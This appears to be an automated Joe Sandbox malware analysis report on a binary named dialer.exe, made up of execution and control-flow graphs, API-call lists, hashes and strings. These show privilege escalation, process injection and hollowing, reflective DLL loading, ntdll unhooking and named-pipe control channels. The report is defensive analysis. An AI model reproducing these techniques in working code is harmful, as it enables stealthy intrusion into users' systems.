                                                                                execution_graph 557 7ff6473426e8 558 7ff647342716 557->558 559 7ff6473428be 557->559 560 7ff64734271c 558->560 561 7ff64734284a GetProcessHeap HeapAlloc K32EnumProcesses 558->561 562 7ff6473428cc 559->562 563 7ff647342b0a ReadFile 559->563 567 7ff647342729 560->567 568 7ff647342841 ExitProcess 560->568 564 7ff647342888 561->564 565 7ff6473427b7 561->565 569 7ff647342b00 562->569 570 7ff6473428d5 562->570 563->565 566 7ff647342b34 563->566 564->565 576 7ff6473410c0 30 API calls 564->576 566->565 577 7ff6473419ac 3 API calls 566->577 572 7ff6473427e4 RegOpenKeyExW 567->572 573 7ff647342732 567->573 571 7ff647341768 22 API calls 569->571 574 7ff6473428e0 570->574 575 7ff647342aa5 570->575 571->565 578 7ff647342811 RegDeleteValueW 572->578 579 7ff647342825 572->579 573->565 589 7ff64734274f ReadFile 573->589 581 7ff647342921 574->581 582 7ff6473428e5 574->582 580 7ff647341a44 ReadFile 575->580 576->564 584 7ff647342b53 577->584 578->579 627 7ff647341ac4 SysAllocString SysAllocString CoInitializeEx 579->627 586 7ff647342ab4 580->586 643 7ff647341a44 581->643 582->565 640 7ff647341958 582->640 584->565 592 7ff647342b67 GetProcessHeap HeapAlloc 584->592 593 7ff6473427bc 584->593 586->565 596 7ff647341a44 ReadFile 586->596 588 7ff64734282a 635 7ff647341768 GetProcessHeap HeapAlloc 588->635 589->565 595 7ff647342779 589->595 591 7ff647342938 ReadFile 591->565 599 7ff647342960 591->599 600 7ff6473414e4 13 API calls 592->600 605 7ff647342c18 4 API calls 593->605 595->565 607 7ff6473419ac 3 API calls 595->607 602 7ff647342acb 596->602 599->565 604 7ff64734296d GetProcessHeap HeapAlloc ReadFile 599->604 617 7ff647342ba0 600->617 602->565 608 7ff647342ad3 ShellExecuteW 602->608 609 7ff647342a97 GetProcessHeap 604->609 610 7ff6473429b1 604->610 605->565 613 7ff647342798 607->613 608->565 614 7ff647342bde HeapFree 609->614 610->609 619 7ff647342a05 lstrlenW GetProcessHeap HeapAlloc 610->619 620 7ff6473429e2 610->620 611 7ff647342bd5 GetProcessHeap 611->614 613->565 613->593 616 7ff6473427a8 613->616 614->565 618 7ff6473410c0 30 API calls 616->618 617->611 667 7ff6473416d8 617->667 618->565 624 7ff647342a49 619->624 620->609 647 7ff647341db4 620->647 661 7ff647342c18 CreateFileW 624->661 628 7ff647341b16 CoInitializeSecurity 627->628 629 7ff647341c35 SysFreeString SysFreeString 627->629 630 7ff647341b5e CoCreateInstance 628->630 631 7ff647341b52 628->631 629->588 632 7ff647341c2f CoUninitialize 630->632 633 7ff647341b92 VariantInit 630->633 631->630 631->632 632->629 634 7ff647341be8 633->634 634->632 636 7ff6473414e4 13 API calls 635->636 638 7ff6473417a6 636->638 637 7ff6473417d4 GetProcessHeap HeapFree 638->637 639 7ff6473416d8 5 API calls 638->639 639->638 641 7ff647341a14 2 API calls 640->641 642 7ff64734196d 641->642 644 7ff647341a68 ReadFile 643->644 645 7ff647341aa5 644->645 646 7ff647341a8b 644->646 645->565 645->591 646->644 646->645 658 7ff647341de0 647->658 648 7ff647341fb8 648->609 649 7ff647341e3e CreateProcessW 650 7ff647341e86 VirtualAllocEx 649->650 649->658 651 7ff647341eb9 WriteProcessMemory 650->651 650->658 651->658 652 7ff647341fc4 OpenProcess 653 7ff647341fd7 TerminateProcess 652->653 652->658 653->658 654 7ff647341f2a VirtualAlloc 655 7ff647341f49 GetThreadContext 654->655 654->658 657 7ff647341f61 WriteProcessMemory 655->657 655->658 656 7ff647341ee4 WriteProcessMemory 656->658 657->658 659 7ff647341f89 SetThreadContext 657->659 658->648 658->649 658->652 658->654 658->656 659->658 660 7ff647341fa9 ResumeThread 659->660 660->648 660->658 662 7ff647342a83 GetProcessHeap HeapFree 661->662 663 7ff647342c62 WriteFile 661->663 662->609 664 7ff647342c86 663->664 665 7ff647342ca4 CloseHandle 663->665 664->665 666 7ff647342c8a WriteFile 664->666 665->662 666->665 668 7ff6473416f7 OpenProcess 667->668 669 7ff647341751 667->669 668->669 670 7ff64734170f 668->670 669->611 671 7ff6473418f8 2 API calls 670->671 672 7ff64734172f 671->672 673 7ff647341748 CloseHandle 672->673 674 7ff64734173d CloseHandle 672->674 673->669 674->673 406 7ff64734228c 407 7ff647342299 406->407 409 7ff6473422b9 ConnectNamedPipe 407->409 410 7ff6473422ae Sleep 407->410 415 7ff647341c64 AllocateAndInitializeSid 407->415 411 7ff6473422c8 ReadFile 409->411 412 7ff6473422fd Sleep 409->412 410->407 413 7ff647342308 DisconnectNamedPipe 411->413 414 7ff6473422eb 411->414 412->413 413->409 414->413 416 7ff647341cc1 415->416 417 7ff647341d9c 415->417 416->416 418 7ff647341ce4 SetEntriesInAclW 416->418 417->407 418->417 419 7ff647341d1e LocalAlloc 418->419 419->417 420 7ff647341d32 InitializeSecurityDescriptor 419->420 420->417 421 7ff647341d44 SetSecurityDescriptorDacl 420->421 421->417 422 7ff647341d5c CreateNamedPipeW 421->422 422->417 423 7ff647342cc0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 424 7ff647342d16 K32EnumProcesses 423->424 425 7ff647342d76 Sleep 424->425 427 7ff647342d2b 424->427 425->424 426 7ff647342d64 426->425 427->426 429 7ff6473426c8 427->429 430 7ff6473426e0 429->430 431 7ff6473426d5 429->431 430->427 433 7ff6473410c0 431->433 471 7ff6473419ac OpenProcess 433->471 436 7ff6473414c5 436->430 437 7ff647341122 OpenProcess 437->436 438 7ff64734113e OpenProcess 437->438 439 7ff647341208 NtQueryInformationProcess 438->439 440 7ff647341161 K32GetModuleFileNameExW 438->440 441 7ff6473414bc CloseHandle 439->441 442 7ff64734122f 439->442 443 7ff6473411aa CloseHandle 440->443 444 7ff64734117a PathFindFileNameW lstrlenW 440->444 441->436 442->441 445 7ff64734123b OpenProcessToken 442->445 443->439 447 7ff6473411b8 443->447 444->443 446 7ff647341197 StrCpyW 444->446 445->441 449 7ff647341259 GetTokenInformation 445->449 446->443 447->439 448 7ff6473411e3 StrCmpIW 447->448 448->441 448->447 450 7ff6473412fc 449->450 451 7ff647341281 GetLastError 449->451 453 7ff647341303 CloseHandle 450->453 451->450 452 7ff64734128c LocalAlloc 451->452 452->450 454 7ff6473412a2 GetTokenInformation 452->454 453->441 458 7ff647341317 453->458 455 7ff6473412ea 454->455 456 7ff6473412ca GetSidSubAuthorityCount GetSidSubAuthority 454->456 457 7ff6473412f1 LocalFree 455->457 456->457 457->453 458->441 459 7ff6473413a6 StrStrA 458->459 460 7ff6473413ce 458->460 459->458 461 7ff6473413d3 459->461 460->441 461->441 462 7ff6473413fe VirtualAllocEx 461->462 462->441 463 7ff64734142b WriteProcessMemory 462->463 463->441 464 7ff647341446 463->464 476 7ff6473418f8 464->476 466 7ff647341466 466->441 467 7ff647341483 WaitForSingleObject 466->467 470 7ff64734147c CloseHandle 466->470 469 7ff647341492 GetExitCodeThread 467->469 467->470 469->470 470->441 472 7ff6473419d8 IsWow64Process 471->472 473 7ff64734110e 471->473 474 7ff6473419f8 CloseHandle 472->474 475 7ff6473419ea 472->475 473->436 473->437 474->473 475->474 479 7ff647341a14 GetModuleHandleA 476->479 480 7ff647341914 479->480 481 7ff647341a34 GetProcAddress 479->481 481->480 482 7ff647342d84 483 7ff647342d91 482->483 484 7ff647341c64 6 API calls 483->484 485 7ff647342da6 Sleep 483->485 486 7ff647342db1 ConnectNamedPipe 483->486 484->483 485->483 487 7ff647342dc0 ReadFile 486->487 488 7ff647342e0f Sleep 486->488 489 7ff647342e1a DisconnectNamedPipe 487->489 490 7ff647342de3 487->490 488->489 489->486 493 7ff6473426ac 490->493 494 7ff6473426b9 493->494 495 7ff6473426c1 WriteFile 493->495 496 7ff6473410c0 30 API calls 494->496 495->489 496->495 497 7ff647342314 500 7ff647342328 497->500 525 7ff647342078 500->525 504 7ff647342078 14 API calls 505 7ff6473423de GetCurrentProcessId OpenProcess 504->505 506 7ff647342486 FindResourceExA 505->506 507 7ff647342400 OpenProcessToken 505->507 510 7ff6473424a6 SizeofResource 506->510 511 7ff64734231d ExitProcess 506->511 508 7ff647342419 LookupPrivilegeValueW 507->508 509 7ff64734247d CloseHandle 507->509 508->509 512 7ff647342433 AdjustTokenPrivileges 508->512 509->506 510->511 513 7ff6473424bf LoadResource 510->513 512->509 514 7ff647342477 GetLastError 512->514 513->511 515 7ff6473424d3 LockResource GetCurrentProcessId 513->515 514->509 542 7ff6473417f8 GetProcessHeap HeapAlloc 515->542 517 7ff6473424f0 RegCreateKeyExW 518 7ff64734260d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 517->518 519 7ff647342532 ConvertStringSecurityDescriptorToSecurityDescriptorW 517->519 522 7ff647342693 SleepEx 518->522 520 7ff647342587 RegCreateKeyExW 519->520 521 7ff647342566 RegSetKeySecurity LocalFree 519->521 523 7ff6473425c3 GetCurrentProcessId RegSetValueExW RegCloseKey 520->523 524 7ff647342602 RegCloseKey 520->524 521->520 522->522 523->524 524->518 526 7ff647342270 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 525->526 527 7ff647342081 StrCpyW StrCatW GetModuleHandleW 525->527 526->504 527->526 528 7ff6473420d3 GetCurrentProcess K32GetModuleInformation 527->528 530 7ff647342267 FreeLibrary 528->530 531 7ff64734212e CreateFileW 528->531 530->526 531->530 532 7ff647342163 CreateFileMappingW 531->532 533 7ff64734218d MapViewOfFile 532->533 534 7ff64734225e CloseHandle 532->534 535 7ff6473421b1 533->535 536 7ff647342255 CloseHandle 533->536 534->530 535->536 537 7ff6473421cc lstrcmpiA 535->537 539 7ff6473421fd 535->539 536->534 537->535 538 7ff6473421ff VirtualProtect 537->538 548 7ff6473418b8 538->548 539->536 541 7ff64734223a VirtualProtect 541->536 550 7ff6473414e4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 542->550 544 7ff64734183c 545 7ff647341891 GetProcessHeap HeapFree 544->545 546 7ff64734185d OpenProcess 544->546 546->544 547 7ff647341873 TerminateProcess CloseHandle 546->547 547->544 549 7ff6473418c7 548->549 549->541 549->549 551 7ff64734163b GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 550->551 552 7ff647341571 550->552 551->544 552->551 553 7ff647341586 OpenProcess 552->553 555 7ff647341626 CloseHandle 552->555 556 7ff6473415d5 ReadProcessMemory 552->556 553->552 554 7ff6473415a3 K32EnumProcessModules 553->554 554->552 554->555 555->552 556->552

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 2439791646-1130149537
                                                                                • Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                                                • Instruction ID: 2c2eca0257cbb2cdbf09cbc70523e5db35885e311136b59993751dd1c28690d6
                                                                                • Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                                                • Instruction Fuzzy Hash: 5FA11C36A0CB82D6E72AFF21E8442A973A1FB88754F404135DA4E97B64DF7ED548DB00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 26 7ff6473410c0-7ff647341110 call 7ff6473419ac 29 7ff647341116-7ff64734111c 26->29 30 7ff6473414c5-7ff6473414e1 26->30 29->30 31 7ff647341122-7ff647341138 OpenProcess 29->31 31->30 32 7ff64734113e-7ff64734115b OpenProcess 31->32 33 7ff647341208-7ff647341229 NtQueryInformationProcess 32->33 34 7ff647341161-7ff647341178 K32GetModuleFileNameExW 32->34 35 7ff6473414bc-7ff6473414bf CloseHandle 33->35 36 7ff64734122f-7ff647341235 33->36 37 7ff6473411aa-7ff6473411b6 CloseHandle 34->37 38 7ff64734117a-7ff647341195 PathFindFileNameW lstrlenW 34->38 35->30 36->35 39 7ff64734123b-7ff647341253 OpenProcessToken 36->39 37->33 41 7ff6473411b8-7ff6473411df 37->41 38->37 40 7ff647341197-7ff6473411a7 StrCpyW 38->40 39->35 43 7ff647341259-7ff64734127f GetTokenInformation 39->43 40->37 42 7ff6473411e3-7ff6473411f5 StrCmpIW 41->42 42->35 44 7ff6473411fb-7ff647341206 42->44 45 7ff6473412fc 43->45 46 7ff647341281-7ff64734128a GetLastError 43->46 44->33 44->42 48 7ff647341303-7ff647341311 CloseHandle 45->48 46->45 47 7ff64734128c-7ff6473412a0 LocalAlloc 46->47 47->45 49 7ff6473412a2-7ff6473412c8 GetTokenInformation 47->49 48->35 50 7ff647341317-7ff64734131e 48->50 51 7ff6473412ea 49->51 52 7ff6473412ca-7ff6473412e8 GetSidSubAuthorityCount GetSidSubAuthority 49->52 50->35 53 7ff647341324-7ff64734132f 50->53 55 7ff6473412f1-7ff6473412fa LocalFree 51->55 52->55 53->35 54 7ff647341335-7ff64734133f 53->54 54->35 56 7ff647341345-7ff64734134f 54->56 55->48 56->35 57 7ff647341355-7ff647341395 call 7ff647342010 * 3 56->57 57->35 64 7ff64734139b-7ff6473413bb call 7ff647342010 StrStrA 57->64 67 7ff6473413bd-7ff6473413cc 64->67 68 7ff6473413d3-7ff6473413f8 call 7ff647342010 * 2 64->68 67->64 69 7ff6473413ce 67->69 68->35 74 7ff6473413fe-7ff647341425 VirtualAllocEx 68->74 69->35 74->35 75 7ff64734142b-7ff647341444 WriteProcessMemory 74->75 75->35 76 7ff647341446-7ff647341468 call 7ff6473418f8 75->76 76->35 79 7ff64734146a-7ff647341472 76->79 79->35 80 7ff647341474-7ff64734147a 79->80 81 7ff64734147c-7ff647341481 80->81 82 7ff647341483-7ff647341490 WaitForSingleObject 80->82 83 7ff6473414b6 CloseHandle 81->83 84 7ff6473414b1 82->84 85 7ff647341492-7ff6473414a6 GetExitCodeThread 82->85 83->35 84->83 85->84 86 7ff6473414a8-7ff6473414ae 85->86 86->84
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                                                                • API String ID: 2561231171-2835194517
                                                                                • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                • Instruction ID: f3e77400a0266606eb3020b457ef24817696e3b0389e9f606a5bd65f83fe99d4
                                                                                • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                • Instruction Fuzzy Hash: 78B15F75A0CA52C6EB2ABF11E84467A37A1FF84B84F004135CA4E97754EF3EE945E740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                • Instruction ID: 3f348f23ac28e14a6baf95ff6b64399acfeba45036cdd078d437edb8698d600e
                                                                                • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                • Instruction Fuzzy Hash: E851CE32B19A92DAEB6AFF22E8446A933A0FB49B84F444034DE4E97754DE3DD845D700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                • Instruction ID: cd4592de90c7b3895364f23643355ae17ea8882553ac6a970cfb5cc25dfb9991
                                                                                • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                • Instruction Fuzzy Hash: AF418D73A18A51CAE761EF24E4847AD37B4FB44798F40023AEA4D83B98DF79D508DB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                                                • Instruction ID: 492b639e1d5918d7b1d9212c744ab24ea9d11d64bb0b3fadc86d18ae1c090b59
                                                                                • Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                                                • Instruction Fuzzy Hash: 17114921F0DA52C6EB1EBB67E80407967B1EF89B94F088038DE0D93755EE3EE8459700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                • Instruction ID: 813d2ac4bf84602fca093ffd5793b31180814fb95abe8befea67085b620cb89c
                                                                                • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                • Instruction Fuzzy Hash: B0516D3670CA86C2EB6AFB11E95866A73A0FB88B88F044131DE4E53794DF3DD409D700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
                                                                                • Instruction ID: 8b1ce667abdce8486175a141b6d6e556f743b52185798256332db40b0312d224
                                                                                • Opcode Fuzzy Hash: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
                                                                                • Instruction Fuzzy Hash: EC116522A1C642D2EB19FF21E8143B96760EF85BA0F444234E95F976D4CF7EE548E700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
                                                                                • Instruction ID: 57597655738c5c0c4923b92a21c6b622028ef036fb2d53ec939b7f366bd46f96
                                                                                • Opcode Fuzzy Hash: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
                                                                                • Instruction Fuzzy Hash: AA017120A1C646D1EA1EFB21E9043796770AF45BA0F144234D65F936E4CF7EE448EB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                • Instruction ID: d25cf7ca67fccc77c7866c974c472fcfe03b70f615c0424ee0f23640833530ac
                                                                                • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                                                • Instruction Fuzzy Hash: E1218133A0C612CBE719FB16E95453A7771FB86B80F148038DA5A57B64CE3EE844DB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                • Instruction ID: 12c8a6143ce2f7e880850675ceff6b19a7eb07179336f35ff03bfdff227a2378
                                                                                • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                                • Instruction Fuzzy Hash: 48F01D22B0DB9282EB59AF16B5841296661FB88BC0F449039EA8D83758DF3ED845CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00007FF647342328: VerSetConditionMask.NTDLL ref: 00007FF647342397
                                                                                  • Part of subcall function 00007FF647342328: VerSetConditionMask.NTDLL ref: 00007FF6473423A8
                                                                                  • Part of subcall function 00007FF647342328: VerSetConditionMask.NTDLL ref: 00007FF6473423B9
                                                                                  • Part of subcall function 00007FF647342328: VerifyVersionInfoW.KERNEL32 ref: 00007FF6473423CC
                                                                                  • Part of subcall function 00007FF647342328: GetCurrentProcessId.KERNEL32 ref: 00007FF6473423DE
                                                                                  • Part of subcall function 00007FF647342328: OpenProcess.KERNEL32 ref: 00007FF6473423EE
                                                                                  • Part of subcall function 00007FF647342328: OpenProcessToken.ADVAPI32 ref: 00007FF64734240F
                                                                                  • Part of subcall function 00007FF647342328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF647342429
                                                                                  • Part of subcall function 00007FF647342328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF64734246D
                                                                                  • Part of subcall function 00007FF647342328: GetLastError.KERNEL32 ref: 00007FF647342477
                                                                                  • Part of subcall function 00007FF647342328: CloseHandle.KERNELBASE ref: 00007FF647342480
                                                                                  • Part of subcall function 00007FF647342328: FindResourceExA.KERNEL32 ref: 00007FF647342494
                                                                                  • Part of subcall function 00007FF647342328: SizeofResource.KERNEL32 ref: 00007FF6473424AB
                                                                                  • Part of subcall function 00007FF647342328: LoadResource.KERNEL32 ref: 00007FF6473424C4
                                                                                  • Part of subcall function 00007FF647342328: LockResource.KERNEL32 ref: 00007FF6473424D6
                                                                                  • Part of subcall function 00007FF647342328: GetCurrentProcessId.KERNEL32 ref: 00007FF6473424E3
                                                                                • ExitProcess.KERNEL32 ref: 00007FF64734231F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
